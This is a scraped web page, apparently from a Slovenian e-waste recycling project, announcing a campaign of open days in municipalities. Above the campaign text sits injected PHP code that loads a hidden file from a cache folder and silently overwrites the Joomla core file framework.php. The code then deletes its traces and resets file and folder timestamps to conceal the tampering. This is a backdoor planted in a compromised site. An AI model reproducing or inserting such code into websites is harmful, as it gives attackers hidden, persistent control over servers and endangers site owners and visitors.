$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Akcija Dnevi odprtih vrat po slovenskih občinah

Akcija Dnevi odprtih vrat po slovenskih občinah

Akcija Dnevi odprtih vrat po slovenskih občinahV okviru projekta smo zasnovali tudi akcijo osveščanja po slovenskih občinah, ki jo izvajamo skupaj z izvajalci javnih služb po posameznih lokalnih skupnostih. Z navedeno akcijo bomo zaobjeli preko 1 milijona vseh državljanov Slovenije in jih seznanili o tem, kako pomembno je pravilno ravnanje z OEEO in OPBA preko same akcije ter z ogledom E-transformerja. Obenem jim bomo približali tudi oddajo navedenih odpadkov ter jih spodbudili s privlačnimi nagradami. Kje in kako potekajo akcije, si lahko ogledate na povezavi: http://www.life.zeos.si/sl/dogodki/e-odpadke-locuj.html

Z navedenim bomo razširili sporočilo naše akcije:

ODLOČI SE IN LOČI……logo

akcija_obcine_2akcija_obcine_3akcija_obcine_4akcija_obcine_5